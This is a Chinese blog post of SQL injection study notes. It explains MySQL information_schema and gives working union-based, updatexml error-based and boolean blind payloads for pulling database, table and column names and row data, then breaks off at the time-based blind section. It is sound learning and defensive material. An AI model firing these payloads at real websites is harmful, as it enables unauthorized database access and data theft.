SQL注入学习

最新推荐文章于 2022-03-12 13:01:36 发布

Goodric

最新推荐文章于 2022-03-12 13:01:36 发布

阅读量240

点赞数

分类专栏：知识点学习文章标签： sql

本文链接：https://blog.csdn.net/Goodric/article/details/113799706

版权

知识点学习专栏收录该内容

46 篇文章 3 订阅

订阅专栏

sql注入

是指 web 应用程序对用户输入数据的合法性没有判断。

前端传入后端的参数是攻击者可控的，并且参数会带入数据库查询，攻击者可以通过构造不同的 sql 语句实现对数据库的操作。

sql注入漏洞的两个条件

参数用户可控：前端传给后端的参数内容是用户可以控制的。
参数带入数据库查询：传入的参数拼接到 sql 语句，并带入数据库查询。

sql 注入的分类

基于联合查询
基于错误回显
基于盲注，分时间盲注和布尔型盲注
基于cookie 基于user-agent
基于Referer
二次注入
宽字节注入
……

MySQL注入的相关知识点
在MySQL 5.0版本之后，MySQL默认在数据库存放一个 “information_schema”的数据库。
而在该“information_schema”数据库中，需记住三个表名：

schemata
tables
columns

schemata表
存储该用户创建的所有数据库的库名。
该表中记录数据库库名的字段名为schema_name。
比如我这里的 schemata 表中显示我的MySQL中有这些数据库。
在这里插入图片描述
tables 表
存储该用户创建的所有数据库的库名和表名。
该表中记录数据库名的字段名为 table_schema 。
该表中记录表名的字段名为 table_name 。
比如我这里的的 tables 表中显示了这些数据库名和表名。（有很多相同的数据库名是因为一个数据库里有很多表）
在这里插入图片描述
columns 表
存储该用户创建的所有数据库的库名、表名和字段名。
该表中记录数据库库名的字段名为 table_schema 。
该表中记录表名的字段名为 table_name 。
该表中记录字段名的字段名为 column_name 。
如下图是这里的一些库名、表名、字段名。
在这里插入图片描述

MySQL查询语句：
不知道任何条件：

select 要查询的字段名 from 库名.表名

知道一条条件时

select 要查询的字段名 from 库名.表名 where 已知条件的字段名=‘已知条件的值’

知道两条条件时

select 要查询的字段名 from 库名.表名 where 已知条件1的字段名=‘已知条件1的值’ and
已知条件2的字段名=‘已知条件2的值’

——
——

limit的用法

格式为limit m,n ，其中m指记录开始的位置，从0开始，表示第一条记录；n指取n条记录。
例如limit 1,1 表示从第二条记录开始，取一条记录。
不使用 limit 就会把数据全部显现出来，比较繁杂。

需了解的几个函数

database()：当前网站使用的数据库。
version()：当前MySQL的版本。
user()：当前MySQL的用户。

注释符
在MySQL中，常见注释符有：

‘#’
–空格（–+）
/**/

其中/**/属于内联注释，可以用于整个SQL语句中。
如：

?id=-1 /!union/ /!select/ 1,2,3

——
——

union联合注入

在数据库中查询参数id对应的内容，然后将数据库内容输出到页面，就可以使用union注入。

并且可以通过 order by 的查询结果，可以得到字段数。

比如访问order by 3 回显正常，而访问 order by 4 回显错误，则字段数为3 。

如果查询结果字段数为3，union注入语句为：

union select 1,2,3

如果访问：

?id=1 union select 1,2,3

只返回id=1的结果，union select 获取的结果没有输出在页面，这是因为代码只返回第一条结果。
可以通过设置参数id的值，让服务器返回union select 的结果。
如把id的值设为-1，数据库中没有id=-1的数据，就会返回 union select 的结果。

之后可以根据返回的信息确定 1，2，3 哪些位置是可以输入MySQL语句的。
比如在 2 的位置可以输入，尝试在 2 的位置查询当前数据库名（使用database()函数）
访问

?id=-1 union select 1,database(),3

页面就能返回数据库的库名。

在得知数据库名后，可以查询此数据库的表名。
比如查询到的数据库为“sql”：

?id=-1 union select 1,(select table_name from
information_schema.tables where table_schema=‘sql’ limit 0,1;),3

这里指查询数据库名 table_schema 为 sql 的第一个表名 table_name 。
如果要查第二个表名，修改 limit 的数字即可。

当通过查询得到所有的库名和表名（假设前面查询到的表名为email），就可以开始查询字段名：

?id=-1 union select 1,(select column_name from
information_schema.columns where table_schema=‘sql’ and
table_name=‘email’ limit 0,1;),3

假如前面查询的字段名为 email_id
当获取了库名、表名和字段名时，就可以构造sql语句查询数据库的数据：

?id=-1 union select 1,(select email_id from sql.email limit 0,1;),3

——
——

报错注入

访问?username=1’ 时，会因为多了一个单引号报错，输出类似于以下内容：

You have an error in your SQL synatx; check the manual that
corresponds to your Mysql server version for the right syntax to use
near ‘‘1’’’ at line 1

程序直接将错误信息输出在了页面上，所以可以利用报错注入获取数据。
报错注入有很多种格式，这里演示用函数updatexml() 获取信息。
获取user() 的值：

1’ and updatexml(1,concat(0x7e,(select user()),0x7e,1)–+

（0x7e为’~'的ASCII编码）
获取当前数据库名：

1’ and updatexml(1,concat(0x7e,(select database()),0x7e,1)–+

接着可以用select语句获取数据库中的库名、表名和字段名，语句使用与union注入相同。
——
——

Boolean注入（布尔型盲注）

访问网站时，页面只返回 yes 或 no
比如访问 id=1’ and 1=1 返回 yes ，访问 id=1’ and 1=2 返回no 。
只返回 yes 或 no，而不是数据库中的数据，所以不能使用union 注入。
Boolen 注入是指构造sql 判断语句，通过页面返回结果推测哪些 sql 判断条件是成立的。

判断数据库名的长度：

?id=1’ and length(database())>=1 --+

通过改变 1 位置的数字，增大数字知道页面返回no的时候就得出了数据库名的长度。
假如增大到4时返回结果为no ，则数据库名长度为3 。

然后通过逐字符判断的方式获取数据库名。数据库名范围一般在a_z、09之内，可能还有一些特殊字符（数据库中字母不分大小写）。
逐字符判断的sql语句：

?id=1’ and substr(database(),1,1)=‘t’–+

也可以把’t’的位置换成ASCII码，比如 t 的ASCII码为116 。
substr是截取的意思，这里截取database()的值，从第一个字符开始，每次返回一个。
substr与limit的用法相比，limit是从0开始，而substr是从1开始。

就这样一个字符一个字符地去试，手工的话还是很麻烦的。
查询表名、字段名的语句也是放在前面database() 的位置。
如查数据库 sql 中的第一个表名 email ：

id=1’ and substr((select table_name from information_schema.tables
where table_schema=‘sql’ limit 0,1),1,1)=‘e’–+

——
——

时间型盲注

和布尔型盲注返回信息相同，只有 yes 和 no ，不同之处在于时间型盲注利用 sleep() 或 benchmark() 等函数让MySQL的执行时间变长。
时间盲注多结合 if(expr1,expr2,expr3) 使用，含义：如果expr1为true，if()返回值为expr2，否则返回expr3 。
所以判断数据库名长度语句：